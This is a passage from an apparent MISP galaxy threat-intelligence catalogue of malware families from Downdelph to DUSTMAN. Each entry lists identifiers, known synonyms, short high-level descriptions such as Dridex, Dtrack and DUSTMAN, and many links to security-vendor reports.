- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd - webarchive
- https://blog.talosintelligence.com/2022/03/threat-advisory-doublezero.html - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-doublezero - webarchive
- https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/ - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://cert.gov.ua/article/38088 - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://securelist.com/new-ransomware-trends-in-2022/106457/ - webarchive
- https://www.splunk.com/en_us/blog/security/threat-update-doublezero-destructor.html - webarchive
- https://unit42.paloaltonetworks.com/doublezero-net-wiper/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Downdelph
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Downdelph.
Known Synonyms |
---|
DELPHACY |
Internal MISP references
UUID e6a077cb-42cc-4193-9006-9ceda8c0dff2
which can be used as unique global reference for Downdelph
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph - webarchive
- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
- http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf - webarchive
- https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection - webarchive
- https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Downeks
Internal MISP references
UUID c8149b45-7d28-421e-bc6f-25c4b8698b92
which can be used as unique global reference for Downeks
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks - webarchive
- https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/ - webarchive
- http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DownPaper
DownPaper, sometimes delivered as sami.exe, is a backdoor trojan. Its main functionality is to download and run a second stage. This malware has been observed in campaigns involving Charming Kitten, an Iranian cyberespionage group.
Internal MISP references
UUID 227862fd-ae83-4e3d-bb69-cc1a45a13aed
which can be used as unique global reference for DownPaper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DracuLoader
Cyber Defense Institute stated that this shellcode PE loader was observed staging win.hemigate.
Internal MISP references
UUID 5f5e0719-7e2d-4d99-ac60-e9728b58c373
which can be used as unique global reference for DracuLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DramNudge
Internal MISP references
UUID 627a044b-1c84-409c-9f58-95b46d5d51ba
which can be used as unique global reference for DramNudge
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DRATzarus
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DRATzarus.
Known Synonyms |
---|
ThreatNeedle |
Internal MISP references
UUID 1ff3afab-8b3f-4b9c-90c7-61062d2dfe0b
which can be used as unique global reference for DRATzarus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus - webarchive
- http://blog.nsfocus.net/stumbzarus-apt-lazarus/ - webarchive
- https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf - webarchive
- https://vblocalhost.com/uploads/VB2021-Park.pdf - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DreamBot
2010: Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)
2014: Dreambot (Gozi ISFB variant)
In 2014, a variant of Gozi ISFB was developed. The main change is in the dropper, which performs additional anti-VM checks (VMware, VBox, QEMU), while the actual bot DLL remains largely unchanged. New functionality such as Tor support was added, and the Fluxxy fast-flux network is often used.
See win.gozi for additional historical information.
Internal MISP references
UUID ac4fbbb0-9a21-49ce-be82-e44cb02a7819
which can be used as unique global reference for DreamBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot - webarchive
- https://lokalhost.pl/gozi_tree.txt - webarchive
- https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122 - webarchive
- https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality - webarchive
- https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451 - webarchive
- https://www.youtube.com/watch?v=EyDiIAt__dI - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://community.riskiq.com/article/30f22a00 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dridex
OxCERT blog describes Dridex as "an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet; if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs are effective only in the short term." According to MalwareBytes, "Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method." IBM X-Force discovered "a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows use to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems."
Internal MISP references
UUID b4216929-1626-4444-bdd7-bfd4b68a766e
which can be used as unique global reference for Dridex
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex - webarchive
- https://adalogics.com/blog/the-state-of-advanced-code-injections - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://community.riskiq.com/article/2cd1c003 - webarchive
- https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/ - webarchive
- https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/ - webarchive
- https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/ - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
- https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-heron - webarchive
- https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them - webarchive
- https://artik.blue/malware3 - webarchive
- https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/ - webarchive
- https://estr3llas.github.io/unveiling-custom-packers-a-comprehensive-guide/ - webarchive
- https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/ - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://community.riskiq.com/article/e4fb7245 - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://blog.lexfo.fr/dridex-malware.html - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf - webarchive
- https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain - webarchive
- https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/ - webarchive
- https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf - webarchive
- https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office - webarchive
- https://securityintelligence.com/dridexs-cold-war-enter-atombombing/ - webarchive
- https://unit42.paloaltonetworks.com/banking-trojan-techniques/ - webarchive
- https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/ - webarchive
- https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/ - webarchive
- https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf - webarchive
- https://en.wikipedia.org/wiki/Maksim_Yakubets - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/ - webarchive
- https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex - webarchive
- https://threatresearch.ext.hp.com/detecting-ta551-domains/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77 - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/ - webarchive
- https://medium.com/s2wlab/operation-synctrek-e5013df8d167 - webarchive
- https://home.treasury.gov/news/press-releases/sm845 - webarchive
- https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation - webarchive
- https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware - webarchive
- https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/ - webarchive
- https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/ - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://malwarebookreports.com/cryptone-cobalt-strike/ - webarchive
- https://twitter.com/TheDFIRReport/status/1356729371931860992 - webarchive
- https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/ - webarchive
- https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps - webarchive
- https://www.atomicmatryoshka.com/post/malware-headliners-dridex - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-heron - webarchive
- https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/ - webarchive
- https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf - webarchive
- https://www.youtube.com/watch?v=1VB15_HgUkg - webarchive
- https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization - webarchive
- https://twitter.com/Cryptolaemus1/status/1407135648528711680 - webarchive
- https://malcat.fr/blog/cutting-corners-against-a-dridex-downloader/ - webarchive
- https://viql.github.io/dridex/ - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/ - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt - webarchive
- https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/ - webarchive
- https://twitter.com/felixw3000/status/1382614469713530883?s=20 - webarchive
- https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/ - webarchive
- https://cyber-anubis.github.io/malware%20analysis/dridex/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much - webarchive
- https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf - webarchive
- https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks - webarchive
- https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/ - webarchive
- https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://unit42.paloaltonetworks.com/travel-themed-phishing/ - webarchive
- https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp - webarchive
- https://github.com/rad9800/talks/blob/main/MALWARE_MADNESS.pdf - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf - webarchive
- https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf - webarchive
- https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/ - webarchive
- https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/ - webarchive
- https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - webarchive
- https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/ - webarchive
- https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/ - webarchive
- https://muha2xmad.github.io/unpacking/dridex/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/ - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DRIFTPIN
Driftpin is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DRIFTPIN.
Known Synonyms |
---|
Spy.Agent.ORM |
Toshliph |
Internal MISP references
UUID 76f6f047-1362-4651-bd2f-9ca10c119e8d
which can be used as unique global reference for DRIFTPIN
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-niagara - webarchive
- https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dripion
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dripion.
Known Synonyms |
---|
Masson |
Internal MISP references
UUID a752676f-06c1-426c-9fcb-6c199afc74af
which can be used as unique global reference for Dripion
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DriveOcean
Communicates via Google Drive.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DriveOcean.
Known Synonyms |
---|
Google Drive RAT |
Internal MISP references
UUID 730a4e94-4f9b-4f34-a1f3-1c97d341332c
which can be used as unique global reference for DriveOcean
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Drokbk
Drokbk stands out for its use of the GitHub platform as part of its C&C infrastructure. This makes it difficult to detect and remove, as GitHub is not traditionally associated with malicious activities.
Drokbk attacks have been linked to the Iranian APT group Nemesis Kitten. This group is believed to use Drokbk for cyberespionage and financial information theft activities.
Internal MISP references
UUID b29c0d53-597d-41c9-a1d0-04dbaa4917f8
which can be used as unique global reference for Drokbk
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.drokbk - webarchive
- https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver - webarchive
- https://www.esentire.com/blog/exploitation-of-vmware-horizon-servers-by-tunnelvision-threat-actor - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DropBook
DropBook is a backdoor developed by the Molerats group and first appeared in late 2020. The backdoor abuses Facebook and Dropbox platforms for C2 purposes, where fake Facebook accounts are used by the operators to control the backdoor by posting commands on the accounts.
Internal MISP references
UUID 8c142a72-0efb-4850-b684-bc6b5300f85e
which can be used as unique global reference for DropBook
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dropbook - webarchive
- https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf - webarchive
- https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DROPSHOT
Internal MISP references
UUID cfdb02f2-a767-4abb-b04c-333a02cdd7e2
which can be used as unique global reference for DROPSHOT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot - webarchive
- https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html - webarchive
- https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/ - webarchive
- https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dtrack
Dtrack is a Remote Administration Tool (RAT) developed by the Lazarus group. Its core functionality includes operations to upload a file to the victim's computer, download a file from the victim's computer, dump disk volume data, establish persistence, and more.
A variant of Dtrack was found at the Kudankulam Nuclear Power Plant (KNPP), where it was used in a targeted attack.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dtrack.
Known Synonyms |
---|
Preft |
TroyRAT |
Internal MISP references
UUID 414f95e1-aabe-4aa9-b9be-53e0826f62c1
which can be used as unique global reference for Dtrack
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack - webarchive
- https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://securelist.com/my-name-is-dtrack/93338/ - webarchive
- https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md - webarchive
- https://securelist.com/dtrack-targeting-europe-latin-america/107798/ - webarchive
- https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/ - webarchive
- https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomware/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage - webarchive
- https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/ - webarchive
- https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20 - webarchive
- https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF - webarchive
- https://blog.macnica.net/blog/2020/11/dtrack.html - webarchive
- https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/ - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/ - webarchive
- https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DualToy (Windows)
Internal MISP references
UUID 440daef1-385d-42fd-a714-462590d4ce6b
which can be used as unique global reference for DualToy (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkHotel
Internal MISP references
UUID 309d0745-bbfd-43bc-b2c4-511592a475bf
which can be used as unique global reference for DarkHotel
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel - webarchive
- https://www.reuters.com/article/us-health-coronavirus-who-hack-exclusive/exclusive-elite-hackers-target-who-as-coronavirus-cyberattacks-spike-idUSKBN21A3BN - webarchive
- http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html - webarchive
- https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/ - webarchive
- https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DUBrute
Internal MISP references
UUID 2236a08f-dfbd-4f92-9d73-a895c34766ad
which can be used as unique global reference for DUBrute
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DUCKTAIL
According to Tony Lambert, this is malware written in .NET. It was observed being delivered using the .NET Single File deployment feature.
Internal MISP references
UUID 9313d400-2b39-4c0f-a967-554b71a23e70
which can be used as unique global reference for DUCKTAIL
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail - webarchive
- https://harfanglab.io/en/insidethelab/reverse-engineering-ida-pro-aot-net/ - webarchive
- https://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection - webarchive
- https://forensicitguy.github.io/analyzing-net-core-single-file-ducktail/ - webarchive
- https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html - webarchive
- https://securelist.com/ducktail-fashion-week/111017/ - webarchive
- https://www.zscaler.com/blogs/security-research/look-ducktail - webarchive
- https://www.f-secure.com/content/dam/labs/docs/WithSecure_Research_DUCKTAIL.pdf - webarchive
- https://labs.withsecure.com/content/dam/labs/docs/WithSecure_Research_DUCKTAIL.pdf - webarchive
- https://yoroi.company/research/ducktail-dissecting-a-complex-infection-chain-started-from-social-engineering/ - webarchive
- https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf - webarchive
- https://www.appgate.com/blog/vietnamese-information-stealer-campaigns-target-professionals-on-linkedin - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dumador
Internal MISP references
UUID ea59906d-b5e1-4749-8494-9ad9a09510b5
which can be used as unique global reference for Dumador
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DuQu
Internal MISP references
UUID 7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6
which can be used as unique global reference for DuQu
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu - webarchive
- https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/ - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf - webarchive
- https://web.archive.org/web/20230416140914if_/http://www.chinaview.cn/20230411/4e0fa0f4fd1d408aaddeef8be63a4757/202304114e0fa0f4fd1d408aaddeef8be63a4757_20230411161526_0531.pdf - webarchive
- https://docs.broadcom.com/doc/w32-duqu-11-en - webarchive
- https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf - webarchive
- http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DUSTMAN
In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named "DUSTMAN" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim’s network that were not wiped by the malware, NCSC assesses that the threat actor behind the attack had some kind of urgency in executing the files on the date of the attack, given the multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack "DUSTMAN" after the filename and a string embedded in the malware. "DUSTMAN" can be considered a new variant of the "ZeroCleare" malware, which was published in December 2019.
Internal MISP references
UUID daa3d1e4-9265-4f1c-b1bd-9242ac570681
which can be used as unique global reference for DUSTMAN
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/ - webarchive
- https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report - webarchive
